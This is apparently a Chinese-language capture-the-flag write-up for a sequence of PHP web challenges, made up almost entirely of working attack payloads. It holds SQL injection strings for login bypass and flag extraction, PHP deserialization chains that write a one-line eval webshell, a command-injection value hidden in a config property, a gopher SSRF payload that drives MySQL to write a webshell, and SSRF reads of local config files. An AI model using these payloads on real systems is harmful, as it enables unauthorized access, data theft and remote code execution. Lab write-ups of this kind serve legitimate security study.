题目环境,用Seay自动审计了一下,啥也没找出来
自己来,找到一处SQL注入没有任何过滤
payload
userid=1' union select 1#&userpwd=1
function sds_decode($str){
return md5(md5($str.md5(base64_encode("sds")))."sds");
}
echo sds_decode('1');
//d9c77c4e454869d5d8da3b4be79694d3
payload
userid=1' union select 'd9c77c4e454869d5d8da3b4be79694d3'#&userpwd=1
Seay扫到注入点,这次直接admin\admin
就可以登录了
可以新增,
payload
dpt_name=1',sds_address =(select database())#
dpt_name=1',sds_address =(select group_concat(table_name) from information_schema.tables where table_schema=database())#
dpt_name=1',sds_address =(select group_concat(column_name) from information_schema.columns where table_name="sds_fl9g")#
dpt_name=1',sds_address =(select flag from sds_fl9g)#
新增全局WAF
function sds_waf($str){
return preg_match('/[0-9]|[a-z]|-/i', $str);
}
额,用之前的方法也还是可以拿到flag
dpt_name=1',sds_address =(select flag from sds_flaag)#
Seay扫到存在写文件,还存在反序列化
构造序列化链,写一句话马
class user{
public $username;
public $password;
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function __destruct(){
file_put_contents($this->username, $this->password);
}
}
echo urlencode(serialize(new user('1.php','')));
//O%3A4%3A%22user%22%3A2%3A%7Bs%3A8%3A%22username%22%3Bs%3A5%3A%221.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5B1%5D%29%3B%3F%3E%22%3B%7D
class dao{
private $conn;
public function __construct(){
$this->conn=new log();
}
public function __destruct(){
$this->conn->close();
}
}
class log{
public $title='1.php';
public $info='';
public function close(){
file_put_contents($this->title, $this->info);
}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6OToiAGRhbwBjb25uIjtPOjM6ImxvZyI6Mjp7czo1OiJ0aXRsZSI7czo1OiIxLnBocCI7czo0OiJpbmZvIjtzOjI0OiI8P3BocCBldmFsKCRfUE9TVFsxXSk7Pz4iO319
很明显了,只需要利用这个就可以写马了 $this->config->cache_dir
class config{
public $cache_dir = ';echo "" >1.php;';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czo5OiJjYWNoZV9kaXIiO3M6NDE6IjtlY2hvICI8P3BocCBldmFsKFwkX1BPU1RbMV0pPz4iID4gMS5waHA7Ijt9fQ==
还是从login.php这里的反序列化开始找链子
很显然就是要去利用$update_url带到checkUpdate
去打SSRF,MySQL没密码
class config{
public $update_url = 'gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%46%00%00%00%03%73%65%6c%65%63%74%20%27%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%33%36%30%5d%29%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%27%01%00%00%00%01';
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
$a=new dao();
echo base64_encode(serialize($a));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxODoiAGNvbmZpZwB1cGRhdGVfdXJsIjtzOjc2MzoiZ29waGVyOi8vMTI3LjAuMC4xOjMzMDYvXyVhMyUwMCUwMCUwMSU4NSVhNiVmZiUwMSUwMCUwMCUwMCUwMSUyMSUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCUwMCU3MiU2ZiU2ZiU3NCUwMCUwMCU2ZCU3OSU3MyU3MSU2YyU1ZiU2ZSU2MSU3NCU2OSU3NiU2NSU1ZiU3MCU2MSU3MyU3MyU3NyU2ZiU3MiU2NCUwMCU2NiUwMyU1ZiU2ZiU3MyUwNSU0YyU2OSU2ZSU3NSU3OCUwYyU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU2ZSU2MSU2ZCU2NSUwOCU2YyU2OSU2MiU2ZCU3OSU3MyU3MSU2YyUwNCU1ZiU3MCU2OSU2NCUwNSUzMiUzNyUzMiUzNSUzNSUwZiU1ZiU2MyU2YyU2OSU2NSU2ZSU3NCU1ZiU3NiU2NSU3MiU3MyU2OSU2ZiU2ZSUwNiUzNSUyZSUzNyUyZSUzMiUzMiUwOSU1ZiU3MCU2YyU2MSU3NCU2NiU2ZiU3MiU2ZCUwNiU3OCUzOCUzNiU1ZiUzNiUzNCUwYyU3MCU3MiU2ZiU2NyU3MiU2MSU2ZCU1ZiU2ZSU2MSU2ZCU2NSUwNSU2ZCU3OSU3MyU3MSU2YyU0NiUwMCUwMCUwMCUwMyU3MyU2NSU2YyU2NSU2MyU3NCUyMCUyNyUzYyUzZiU3MCU2OCU3MCUyMCU2NSU3NiU2MSU2YyUyOCUyNCU1ZiU1MCU0ZiU1MyU1NCU1YiUzMyUzNiUzMCU1ZCUyOSUzZiUzZSUyNyUyMCU2OSU2ZSU3NCU2ZiUyMCU2ZiU3NSU3NCU2NiU2OSU2YyU2NSUyMCUyNyUyZiU3NiU2MSU3MiUyZiU3NyU3NyU3NyUyZiU2OCU3NCU2ZCU2YyUyZiUzMSUyZSU3MCU2OCU3MCUyNyUwMSUwMCUwMCUwMCUwMSI7fX0=
这次MySQL有密码,猜测不是redis就是fastcgi了,一样的
这次如果还是按照上一题的方法打fastcgi传一句话马
会发现可以传成功,但是用蚁剑去连读不到flag,很奇怪不知道为什么
看了眼大佬的方法,是去读nginx.conf,这个配置文件
class config{
public $update_url ="file:///etc/nginx/nginx.conf";
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyODoiZmlsZTovLy9ldGMvbmdpbngvbmdpbnguY29uZiI7fX0=
class config{
public $update_url ="http://127.0.0.1:4476/";
}
class dao{
private $config;
public function __construct(){
$this->config=new config();
}
}
echo base64_encode(serialize(new dao()));
//TzozOiJkYW8iOjE6e3M6MTE6IgBkYW8AY29uZmlnIjtPOjY6ImNvbmZpZyI6MTp7czoxMDoidXBkYXRlX3VybCI7czoyMjoiaHR0cDovLzEyNy4wLjAuMTo0NDc2LyI7fX0=